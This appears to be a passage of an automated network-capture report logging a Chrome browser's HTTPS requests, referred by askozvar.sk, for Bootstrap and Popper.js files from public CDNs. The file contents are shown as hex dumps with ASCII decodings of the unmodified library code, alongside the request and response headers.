                        2024-08-30 22:35:42 UTC1369INData Raw: 36 36 37 25 3b 66 6c 65 78 3a 30 20 30 20 36 36 2e 36 36 36 36 36 37 25 3b 6d 61 78 2d 77 69 64 74 68 3a 36 36 2e 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 39 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 37 35 25 3b 66 6c 65 78 3a 30 20 30 20 37 35 25 3b 6d 61 78 2d 77 69 64 74 68 3a 37 35 25 7d 2e 63 6f 6c 2d 31 30 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 38 33 2e 33 33 33 33 33 33 25 3b 66 6c 65 78 3a 30 20 30 20 38 33 2e 33 33 33 33 33 33 25 3b 6d 61 78 2d 77 69 64 74 68 3a 38 33 2e 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 31 31 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36
                        Data Ascii: 667%;flex:0 0 66.666667%;max-width:66.666667%}.col-9{-webkit-box-flex:0;-ms-flex:0 0 75%;flex:0 0 75%;max-width:75%}.col-10{-webkit-box-flex:0;-ms-flex:0 0 83.333333%;flex:0 0 83.333333%;max-width:83.333333%}.col-11{-webkit-box-flex:0;-ms-flex:0 0 91.6666
                        2024-08-30 22:35:42 UTC1369INData Raw: 32 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 36 2e 36 36 36 36 36 37 25 7d 2e 6f 66 66 73 65 74 2d 33 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 32 35 25 7d 2e 6f 66 66 73 65 74 2d 34 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 33 2e 33 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d 35 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 34 31 2e 36 36 36 36 36 37 25 7d 2e 6f 66 66 73 65 74 2d 36 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 30 25 7d 2e 6f 66 66 73 65 74 2d 37 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 35 38 2e 33 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d 38 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 36 36 2e 36 36 36 36 36 37 25 7d 2e 6f 66 66 73 65 74 2d 39 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 37 35 25 7d 2e 6f 66 66 73 65 74 2d 31 30 7b 6d 61 72 67 69 6e 2d 6c 65
                        Data Ascii: 2{margin-left:16.666667%}.offset-3{margin-left:25%}.offset-4{margin-left:33.333333%}.offset-5{margin-left:41.666667%}.offset-6{margin-left:50%}.offset-7{margin-left:58.333333%}.offset-8{margin-left:66.666667%}.offset-9{margin-left:75%}.offset-10{margin-le
                        2024-08-30 22:35:42 UTC1369INData Raw: 3a 30 20 30 20 38 33 2e 33 33 33 33 33 33 25 3b 6d 61 78 2d 77 69 64 74 68 3a 38 33 2e 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 73 6d 2d 31 31 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36 36 37 25 3b 66 6c 65 78 3a 30 20 30 20 39 31 2e 36 36 36 36 36 37 25 3b 6d 61 78 2d 77 69 64 74 68 3a 39 31 2e 36 36 36 36 36 37 25 7d 2e 63 6f 6c 2d 73 6d 2d 31 32 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 66 6c 65 78 3a 30 20 30 20 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 6f 72 64 65 72 2d 73 6d 2d 66 69 72 73 74 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 30 3b 2d 6d
                        Data Ascii: :0 0 83.333333%;max-width:83.333333%}.col-sm-11{-webkit-box-flex:0;-ms-flex:0 0 91.666667%;flex:0 0 91.666667%;max-width:91.666667%}.col-sm-12{-webkit-box-flex:0;-ms-flex:0 0 100%;flex:0 0 100%;max-width:100%}.order-sm-first{-webkit-box-ordinal-group:0;-m


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        3192.168.2.449742104.18.10.2074433060C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-08-30 22:35:42 UTC587OUTGET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1
                        Host: maxcdn.bootstrapcdn.com
                        Connection: keep-alive
                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                        Origin: https://www.askozvar.sk
                        sec-ch-ua-mobile: ?0
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        sec-ch-ua-platform: "Windows"
                        Accept: */*
                        Sec-Fetch-Site: cross-site
                        Sec-Fetch-Mode: cors
                        Sec-Fetch-Dest: script
                        Referer: https://www.askozvar.sk/
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-08-30 22:35:42 UTC968INHTTP/1.1 200 OK
                        Date: Fri, 30 Aug 2024 22:35:42 GMT
                        Content-Type: application/javascript; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Vary: Accept-Encoding
                        CDN-PullZone: 252412
                        CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                        CDN-RequestCountryCode: US
                        Access-Control-Allow-Origin: *
                        Cache-Control: public, max-age=31919000
                        ETag: W/"14d449eb8876fa55e1ef3c2cc52b0c17"
                        Last-Modified: Mon, 25 Jan 2021 22:04:04 GMT
                        CDN-ProxyVer: 1.04
                        CDN-RequestPullSuccess: True
                        CDN-RequestPullCode: 200
                        CDN-CachedAt: 04/02/2024 02:05:57
                        CDN-EdgeStorageId: 1067
                        timing-allow-origin: *
                        cross-origin-resource-policy: cross-origin
                        X-Content-Type-Options: nosniff
                        CDN-Status: 200
                        CDN-RequestId: 2ae170ea942209b9864d1836c99fddc2
                        CDN-Cache: HIT
                        CF-Cache-Status: HIT
                        Age: 38893
                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                        Server: cloudflare
                        CF-RAY: 8bb84164ef474362-EWR
                        alt-svc: h3=":443"; ma=86400
                        2024-08-30 22:35:42 UTC401INData Raw: 37 62 65 62 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74
                        Data Ascii: 7beb/*! * Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(t
                        2024-08-30 22:35:42 UTC1369INData Raw: 65 66 69 6e 65 28 5b 22 65 78 70 6f 72 74 73 22 2c 22 6a 71 75 65 72 79 22 2c 22 70 6f 70 70 65 72 2e 6a 73 22 5d 2c 65 29 3a 65 28 74 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 69 26 26 28 69 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66
                        Data Ascii: efine(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.def
                        2024-08-30 22:35:42 UTC1369INData Raw: 64 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 74 28 6e 29 2e 74 72 69 67 67 65 72 28 65 2e 65 6e 64 29 7d 2c 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 28 65 29 7d 2c 69 73 45 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 28 74 5b 30 5d 7c 7c 74 29 2e 6e 6f 64 65 54 79 70 65 7d 2c 74 79 70 65 43 68 65 63 6b 43 6f 6e 66 69 67 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 66 6f 72 28 76 61 72 20 73 20 69 6e 20 6e 29 69 66 28 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6e 2c 73 29 29 7b 76 61 72 20 72 3d 6e 5b 73 5d 2c 6f 3d 65 5b 73 5d 2c 61 3d 6f 26 26 69 2e 69 73
                        Data Ascii: d:function(n){t(n).trigger(e.end)},supportsTransitionEnd:function(){return Boolean(e)},isElement:function(t){return(t[0]||t).nodeType},typeCheckConfig:function(t,e,n){for(var s in n)if(Object.prototype.hasOwnProperty.call(n,s)){var r=n[s],o=e[s],a=o&&i.is
                        2024-08-30 22:35:42 UTC1369INData Raw: 61 72 20 65 3d 6f 2e 45 76 65 6e 74 28 75 2e 43 4c 4f 53 45 29 3b 72 65 74 75 72 6e 20 6f 28 74 29 2e 74 72 69 67 67 65 72 28 65 29 2c 65 7d 2c 65 2e 5f 72 65 6d 6f 76 65 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 6f 28 74 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 5f 29 2c 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 26 26 6f 28 74 29 2e 68 61 73 43 6c 61 73 73 28 64 29 3f 6f 28 74 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 65 2e 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e 74 28 74 2c 6e 29 7d 29 2e 65 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 31 35 30 29 3a 74 68 69 73 2e 5f 64
                        Data Ascii: ar e=o.Event(u.CLOSE);return o(t).trigger(e),e},e._removeElement=function(t){var e=this;o(t).removeClass(_),P.supportsTransitionEnd()&&o(t).hasClass(d)?o(t).one(P.TRANSITION_END,function(n){return e._destroyElement(t,n)}).emulateTransitionEnd(150):this._d
                        2024-08-30 22:35:42 UTC1369INData Raw: 73 26 26 70 28 73 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 43 29 7d 69 66 28 74 29 7b 69 66 28 69 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6e 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 69 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 7c 7c 6e 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 64 69 73 61 62 6c 65 64 22 29 29 72 65 74 75 72 6e 3b 69 2e 63 68 65 63 6b 65 64 3d 21 70 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 43 29 2c 70 28 69 29 2e 74 72 69 67 67 65 72 28 22 63 68 61 6e 67 65 22 29 7d 69 2e 66 6f 63 75 73 28 29 2c 65 3d 21 31 7d 7d 65 26 26 74 68 69 73 2e 5f 65 6c 65 6d 65
                        Data Ascii: s&&p(s).removeClass(C)}if(t){if(i.hasAttribute("disabled")||n.hasAttribute("disabled")||i.classList.contains("disabled")||n.classList.contains("disabled"))return;i.checked=!p(this._element).hasClass(C),p(i).trigger("change")}i.focus(),e=!1}}e&&this._eleme
                        2024-08-30 22:35:42 UTC1369INData Raw: 3a 22 6d 6f 75 73 65 65 6e 74 65 72 22 2b 69 2c 4d 4f 55 53 45 4c 45 41 56 45 3a 22 6d 6f 75 73 65 6c 65 61 76 65 22 2b 69 2c 54 4f 55 43 48 45 4e 44 3a 22 74 6f 75 63 68 65 6e 64 22 2b 69 2c 4c 4f 41 44 5f 44 41 54 41 5f 41 50 49 3a 22 6c 6f 61 64 22 2b 69 2b 22 2e 64 61 74 61 2d 61 70 69 22 2c 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 3a 22 63 6c 69 63 6b 22 2b 69 2b 22 2e 64 61 74 61 2d 61 70 69 22 7d 2c 5f 3d 22 63 61 72 6f 75 73 65 6c 22 2c 67 3d 22 61 63 74 69 76 65 22 2c 70 3d 22 73 6c 69 64 65 22 2c 6d 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 72 69 67 68 74 22 2c 76 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6c 65 66 74 22 2c 45 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6e 65 78 74 22 2c 54 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74
                        Data Ascii: :"mouseenter"+i,MOUSELEAVE:"mouseleave"+i,TOUCHEND:"touchend"+i,LOAD_DATA_API:"load"+i+".data-api",CLICK_DATA_API:"click"+i+".data-api"},_="carousel",g="active",p="slide",m="carousel-item-right",v="carousel-item-left",E="carousel-item-next",T="carousel-it
                        2024-08-30 22:35:42 UTC1369INData Raw: 76 61 6c 29 2c 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 6e 75 6c 6c 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 26 26 21 74 68 69 73 2e 5f 69 73 50 61 75 73 65 64 26 26 28 74 68 69 73 2e 5f 69 6e 74 65 72 76 61 6c 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 28 64 6f 63 75 6d 65 6e 74 2e 76 69 73 69 62 69 6c 69 74 79 53 74 61 74 65 3f 74 68 69 73 2e 6e 65 78 74 57 68 65 6e 56 69 73 69 62 6c 65 3a 74 68 69 73 2e 6e 65 78 74 29 2e 62 69 6e 64 28 74 68 69 73 29 2c 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 69 6e 74 65 72 76 61 6c 29 29 7d 2c 43 2e 74 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 74 68 69 73 3b 74 68 69 73 2e 5f 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 3d 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 66 69
                        Data Ascii: val),this._interval=null),this._config.interval&&!this._isPaused&&(this._interval=setInterval((document.visibilityState?this.nextWhenVisible:this.next).bind(this),this._config.interval))},C.to=function(e){var n=this;this._activeElement=t(this._element).fi
                        2024-08-30 22:35:42 UTC1369INData Raw: 69 66 28 21 2f 69 6e 70 75 74 7c 74 65 78 74 61 72 65 61 2f 69 2e 74 65 73 74 28 74 2e 74 61 72 67 65 74 2e 74 61 67 4e 61 6d 65 29 29 73 77 69 74 63 68 28 74 2e 77 68 69 63 68 29 7b 63 61 73 65 20 33 37 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 70 72 65 76 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 33 39 3a 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 68 69 73 2e 6e 65 78 74 28 29 7d 7d 2c 43 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 69 74 65 6d 73 3d 74 2e 6d 61 6b 65 41 72 72 61 79 28 74 28 65 29 2e 70 61 72 65 6e 74 28 29 2e 66 69 6e 64 28 79 2e 49 54 45 4d 29 29 2c 74 68 69 73 2e 5f 69 74 65 6d 73 2e 69 6e 64 65 78 4f 66 28 65
                        Data Ascii: if(!/input|textarea/i.test(t.target.tagName))switch(t.which){case 37:t.preventDefault(),this.prev();break;case 39:t.preventDefault(),this.next()}},C._getItemIndex=function(e){return this._items=t.makeArray(t(e).parent().find(y.ITEM)),this._items.indexOf(e
                        2024-08-30 22:35:42 UTC1369INData Raw: 65 6e 74 28 64 2e 53 4c 49 44 2c 7b 72 65 6c 61 74 65 64 54 61 72 67 65 74 3a 63 2c 64 69 72 65 63 74 69 6f 6e 3a 72 2c 66 72 6f 6d 3a 6c 2c 74 6f 3a 5f 7d 29 3b 50 2e 73 75 70 70 6f 72 74 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 26 26 74 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 68 61 73 43 6c 61 73 73 28 70 29 3f 28 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 73 29 2c 50 2e 72 65 66 6c 6f 77 28 63 29 2c 74 28 61 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 63 29 2e 61 64 64 43 6c 61 73 73 28 69 29 2c 74 28 61 29 2e 6f 6e 65 28 50 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 63 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 69 2b 22 20 22 2b 73 29 2e 61 64 64 43 6c 61 73 73 28 67 29 2c 74 28 61 29 2e 72
                        Data Ascii: ent(d.SLID,{relatedTarget:c,direction:r,from:l,to:_});P.supportsTransitionEnd()&&t(this._element).hasClass(p)?(t(c).addClass(s),P.reflow(c),t(a).addClass(i),t(c).addClass(i),t(a).one(P.TRANSITION_END,function(){t(c).removeClass(i+" "+s).addClass(g),t(a).r
                        2024-08-30 22:35:42 UTC1369INData Raw: 44 5f 44 41 54 41 5f 41 50 49 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 28 79 2e 44 41 54 41 5f 52 49 44 45 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 28 74 68 69 73 29 3b 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 65 2c 65 2e 64 61 74 61 28 29 29 7d 29 7d 29 2c 74 2e 66 6e 5b 65 5d 3d 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 74 2e 66 6e 5b 65 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 43 2c 74 2e 66 6e 5b 65 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 66 6e 5b 65 5d 3d 6f 2c 43 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 43 7d 28 65 29 2c 48 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 22 63 6f 6c 6c 61
                        Data Ascii: D_DATA_API,function(){t(y.DATA_RIDE).each(function(){var e=t(this);C._jQueryInterface.call(e,e.data())})}),t.fn[e]=C._jQueryInterface,t.fn[e].Constructor=C,t.fn[e].noConflict=function(){return t.fn[e]=o,C._jQueryInterface},C}(e),H=function(t){var e="colla


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        4192.168.2.449744104.17.25.144433060C:\Program Files\Google\Chrome\Application\chrome.exe
                        TimestampBytes transferredDirectionData
                        2024-08-30 22:35:42 UTC593OUTGET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1
                        Host: cdnjs.cloudflare.com
                        Connection: keep-alive
                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                        Origin: https://www.askozvar.sk
                        sec-ch-ua-mobile: ?0
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                        sec-ch-ua-platform: "Windows"
                        Accept: */*
                        Sec-Fetch-Site: cross-site
                        Sec-Fetch-Mode: cors
                        Sec-Fetch-Dest: script
                        Referer: https://www.askozvar.sk/
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.9
                        2024-08-30 22:35:42 UTC964INHTTP/1.1 200 OK
                        Date: Fri, 30 Aug 2024 22:35:42 GMT
                        Content-Type: application/javascript; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Access-Control-Allow-Origin: *
                        Cache-Control: public, max-age=30672000
                        ETag: W/"5eb03fa9-4af4"
                        Last-Modified: Mon, 04 May 2020 16:15:37 GMT
                        cf-cdnjs-via: cfworker/kv
                        Cross-Origin-Resource-Policy: cross-origin
                        Timing-Allow-Origin: *
                        X-Content-Type-Options: nosniff
                        CF-Cache-Status: HIT
                        Age: 157967
                        Expires: Wed, 20 Aug 2025 22:35:42 GMT
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iRXnagYp59cmFx5VSaY38LyNkJ0LKvIllHFoRX6xirV5EzMR%2Bs2BUtK4ms%2F11NpDaEHoHI%2FYG9vA2RutdaoAWop6YgRGs%2FjO2TCy%2BrVcu2ltViJE25Z%2F2dnxY9NVvoNhQVGDTSnw"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                        Strict-Transport-Security: max-age=15780000
                        Server: cloudflare
                        CF-RAY: 8bb84164fd0a42da-EWR
                        alt-svc: h3=":443"; ma=86400
                        2024-08-30 22:35:42 UTC405INData Raw: 34 61 66 34 0d 0a 2f 2a 0a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 46 65 64 65 72 69 63 6f 20 5a 69 76 6f 6c 6f 20 32 30 31 37 0a 20 44 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 28 6c 69 63 65 6e 73 65 20 74 65 72 6d 73 20 61 72 65 20 61 74 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 29 2e 0a 20 2a 2f 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 27 6f 62 6a 65 63 74 27 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 27 75 6e 64 65 66 69 6e 65 64 27 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 27 66 75 6e 63 74 69 6f 6e 27 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26
                        Data Ascii: 4af4/* Copyright (C) Federico Zivolo 2017 Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT). */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&
                        2024-08-30 22:35:42 UTC1369INData Raw: 28 31 21 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 5b 5d 3b 76 61 72 20 6f 3d 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 2c 6e 75 6c 6c 29 3b 72 65 74 75 72 6e 20 74 3f 6f 5b 74 5d 3a 6f 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 72 65 74 75 72 6e 27 48 54 4d 4c 27 3d 3d 3d 65 2e 6e 6f 64 65 4e 61 6d 65 3f 65 3a 65 2e 70 61 72 65 6e 74 4e 6f 64 65 7c 7c 65 2e 68 6f 73 74 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 73 77 69 74 63 68 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 7b 63 61 73 65 27 48 54 4d 4c 27 3a 63 61 73 65 27 42 4f 44 59 27 3a 72 65 74 75 72 6e 20 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 3b 63 61 73 65 27 23 64 6f 63 75
                        Data Ascii: (1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#docu
                        2024-08-30 22:35:42 UTC1369INData Raw: 65 2c 74 29 7b 76 61 72 20 6f 3d 32 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 32 5d 2c 69 3d 61 28 74 2c 27 74 6f 70 27 29 2c 6e 3d 61 28 74 2c 27 6c 65 66 74 27 29 2c 72 3d 6f 3f 2d 31 3a 31 3b 72 65 74 75 72 6e 20 65 2e 74 6f 70 2b 3d 69 2a 72 2c 65 2e 62 6f 74 74 6f 6d 2b 3d 69 2a 72 2c 65 2e 6c 65 66 74 2b 3d 6e 2a 72 2c 65 2e 72 69 67 68 74 2b 3d 6e 2a 72 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 29 7b 76 61 72 20 6f 3d 27 78 27 3d 3d 3d 74 3f 27 4c 65 66 74 27 3a 27 54 6f 70 27 2c 69 3d 27 4c 65 66 74 27 3d 3d 6f 3f 27 52 69 67 68 74 27 3a 27 42 6f 74 74 6f 6d 27 3b 72 65 74 75 72 6e 20 70 61 72 73 65 46 6c 6f 61 74 28 65 5b 27
                        Data Ascii: e,t){var o=2<arguments.length&&void 0!==arguments[2]&&arguments[2],i=a(t,'top'),n=a(t,'left'),r=o?-1:1;return e.top+=i*r,e.bottom+=i*r,e.left+=n*r,e.right+=n*r,e}function f(e,t){var o='x'===t?'Left':'Top',i='Left'==o?'Right':'Bottom';return parseFloat(e['
